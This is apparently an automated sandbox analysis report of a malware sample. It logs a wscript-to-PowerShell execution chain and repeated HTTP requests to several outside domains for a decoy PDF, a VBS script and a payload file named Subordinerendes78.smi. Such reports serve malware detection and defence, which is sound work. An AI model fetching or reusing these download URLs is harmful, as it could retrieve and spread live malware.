          Source: Binary string: System.Core.pdbID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000008.00000002.2678462798.000001336A368000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Core.pdb source: powershell.exe, 00000008.00000002.2678462798.000001336A356000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.1401973851.000001D46676B000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000008.00000002.2675286463.000001336A183000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: ystem.Management.Automation.pdb source: powershell.exe, 00000004.00000002.1399165537.000001D466470000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000008.00000002.2675286463.000001336A183000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32? source: powershell.exe, 00000004.00000002.1399165537.000001D466470000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.pdbL. source: powershell.exe, 00000008.00000002.2678462798.000001336A368000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbD source: powershell.exe, 00000004.00000002.1402547814.000001D4667F8000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: CallSite.Target.pdbe35 source: powershell.exe, 00000001.00000002.1582637126.000002CDC2CC2000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Core.pdbk source: powershell.exe, 00000008.00000002.2678462798.000001336A356000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: *on.pdb source: powershell.exe, 00000004.00000002.1401973851.000001D46676B000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Core.pdbM source: powershell.exe, 00000008.00000002.2680246932.000001336A3E0000.00000004.00000020.00020000.00000000.sdmp
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior

          Software Vulnerabilities

          barindex
          Suspicious execution chain found
          Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Source: global trafficHTTP traffic detected: GET /wh/List%20of%20required%20items%20and%20services.pdf HTTP/1.1Host: www.fornid.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /na/mg.vbs HTTP/1.1Host: www.pineappletech.aeConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
          Source: Joe Sandbox ViewIP Address: 148.251.114.233 148.251.114.233
          Source: Joe Sandbox ViewASN Name: SERVERPLAN-ASIT SERVERPLAN-ASIT
          Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.almrwad.comConnection: Keep-Alive
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficHTTP traffic detected: GET /wh/List%20of%20required%20items%20and%20services.pdf HTTP/1.1Host: www.fornid.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /na/mg.vbs HTTP/1.1Host: www.pineappletech.aeConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.almrwad.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
          Source: powershell.exe, 00000001.00000002.1514726032.000002CDAC515000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: src="https://www.facebook.com/tr?id=&ev=PageView&noscript=1" equals www.facebook.com (Facebook)
          Source: global trafficDNS traffic detected: DNS query: www.fornid.com
          Source: global trafficDNS traffic detected: DNS query: www.pineappletech.ae
          Source: global trafficDNS traffic detected: DNS query: www.almrwad.com
          Source: global trafficDNS traffic detected: DNS query: www.erp-royal-crown.info
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Dec 2024 09:39:27 GMTServer: ApacheP3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"Set-Cookie: PrestaShop-a30a9934ef476d11b6cc3c983616e364=rMDVJJyqzbUxb1uFCvyisk3G4cITOWZG4GuazMsJ3UP4fxnTX%2FMSpEfZIoqrX%2BXqP6DO2Fqc%2BBFZkXxuDpMJZAgCA9dZBWoLjZLevxRYylY%3D000075; expires=Wed, 25-Dec-2024 09:39:27 GMT; Max-Age=1727999; path=/; domain=www.fornid.com; httponlyUpgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Dec 2024 09:39:35 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Dec 2024 09:39:41 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 05 Dec 2024 09:39:47 GMTserver: LiteSpeed
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Dec 2024 09:39:53 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 05 Dec 2024 09:39:58 GMTserver: LiteSpeed
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Dec 2024 09:40:04 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 05 Dec 2024 09:40:10 GMTserver: LiteSpeed
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Dec 2024 09:40:16 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 05 Dec 2024 09:40:22 GMTserver: LiteSpeed
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Dec 2024 09:40:28 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 05 Dec 2024 09:40:34 GMTserver: LiteSpeed
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Dec 2024 09:40:40 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 05 Dec 2024 09:40:46 GMTserver: LiteSpeed
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Dec 2024 09:40:52 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 05 Dec 2024 09:40:57 GMTserver: LiteSpeed
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Dec 2024 09:41:03 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 05 Dec 2024 09:41:09 GMTserver: LiteSpeed
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Dec 2024 09:41:15 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 05 Dec 2024 09:41:21 GMTserver: LiteSpeed
          Source: powershell.exe, 00000008.00000002.2573246202.0000013352E72000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.0000013352336000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.0000013353188000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.00000133534A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.0000013353BF0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.0000013352716000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.0000013353058000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://almrwad.com
          Source: powershell.exe, 00000001.00000002.1514726032.000002CDAC515000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://blog.fornid.com/
          Source: powershell.exe, 00000008.00000002.2573246202.0000013352F21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.0000013352336000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.0000013352611000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.0000013353224000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.0000013352716000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.0000013353058000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://erp-royal-crown.info
          Source: powershell.exe, 00000001.00000002.1514726032.000002CDAC4EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fornid.com
          Source: powershell.exe, 00000004.00000002.1376648468.000001D44EC2F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
          Source: powershell.exe, 00000001.00000002.1575981920.000002CDBAA66000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1575981920.000002CDBABA9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1395815006.000001D45E4E7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2665221873.0000013361E34000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2665221873.0000013361F76000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
          Source: powershell.exe, 00000008.00000002.2573246202.0000013351FEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
          Source: powershell.exe, 00000004.00000002.1376648468.000001D44E698000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
          Source: powershell.exe, 00000001.00000002.1514726032.000002CDAA9F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1376648468.000001D44E471000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.0000013351DC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: powershell.exe, 00000004.00000002.1376648468.000001D44E698000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
          Source: powershell.exe, 00000008.00000002.2573246202.0000013352E72000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.0000013352336000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.0000013353188000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.00000133534A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.0000013353BF0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.0000013352716000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.0000013353058000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.almrwad.com
          Source: powershell.exe, 00000008.00000002.2573246202.0000013351FEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
          Source: powershell.exe, 00000008.00000002.2573246202.0000013352F21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.0000013352336000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.0000013352611000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.0000013353224000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.0000013352716000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.0000013353058000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.erp-royal-crown.info
          Source: powershell.exe, 00000001.00000002.1514726032.000002CDAC515000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1514726032.000002CDAC4EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fornid.com
          Source: powershell.exe, 00000001.00000002.1514726032.000002CDAC515000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fornid.com/
          Source: powershell.exe, 00000001.00000002.1514726032.000002CDAC515000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fornid.com/content/13-international-shipments
          Source: powershell.exe, 00000001.00000002.1582421341.000002CDC2B50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
          Source: powershell.exe, 00000001.00000002.1514726032.000002CDAC968000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.pineappletech.ae
          Source: powershell.exe, 00000001.00000002.1514726032.000002CDAA9F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1376648468.000001D44E471000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.0000013351DC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
          Source: powershell.exe, 00000004.00000002.1376648468.000001D44E698000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
          Source: powershell.exe, 00000004.00000002.1376648468.000001D44F97A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelpX
          Source: powershell.exe, 00000008.00000002.2665221873.0000013361F76000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
          Source: powershell.exe, 00000008.00000002.2665221873.0000013361F76000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
          Source: powershell.exe, 00000008.00000002.2665221873.0000013361F76000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
          Source: powershell.exe, 00000001.00000002.1514726032.000002CDAC515000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Archivo
          Source: powershell.exe, 00000001.00000002.1514726032.000002CDAC515000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Istok
          Source: powershell.exe, 00000008.00000002.2573246202.0000013351FEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
          Source: powershell.exe, 00000001.00000002.1514726032.000002CDAB622000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1376648468.000001D44EC2F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1376648468.000001D44F97A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
          Source: powershell.exe, 00000001.00000002.1575981920.000002CDBAA66000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1575981920.000002CDBABA9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1395815006.000001D45E4E7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2665221873.0000013361E34000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2665221873.0000013361F76000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
          Source: powershell.exe, 00000001.00000002.1514726032.000002CDAC515000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js
          Source: powershell.exe, 00000001.00000002.1514726032.000002CDAC515000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oss.maxcdn.com/libs/respond.js/1.3.0/respond.min.js
          Source: powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.
          Source: powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.c
          Source: powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.co
          Source: powershell.exe, 00000008.00000002.2573246202.0000013352336000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.0000013353188000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.00000133534A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.0000013353BEA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.0000013352716000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.0000013353058000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.0000013351FEF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com
          Source: powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com/
          Source: powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com/w
          Source: powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com/wh
          Source: powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com/wh/
          Source: powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com/wh/S
          Source: powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com/wh/Su
          Source: powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com/wh/Sub
          Source: powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com/wh/Subo
          Source: powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com/wh/Subor
          Source: powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com/wh/Subord
          Source: powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com/wh/Subordi
          Source: powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com/wh/Subordin
          Source: powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com/wh/Subordine
          Source: powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com/wh/Subordiner
          Source: powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com/wh/Subordinere
          Source: powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com/wh/Subordineren
          Source: powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com/wh/Subordinerend
          Source: powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com/wh/Subordinerende
          Source: powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com/wh/Subordinerendes
          Source: powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com/wh/Subordinerendes7
          Source: powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com/wh/Subordinerendes78
          Source: powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com/wh/Subordinerendes78.
          Source: powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com/wh/Subordinerendes78.s
          Source: powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com/wh/Subordinerendes78.sm
          Source: powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com/wh/Subordinerendes78.smi
          Source: powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.
          Source: powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.i
          Source: powershell.exe, 00000008.00000002.2573246202.0000013353541000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.in
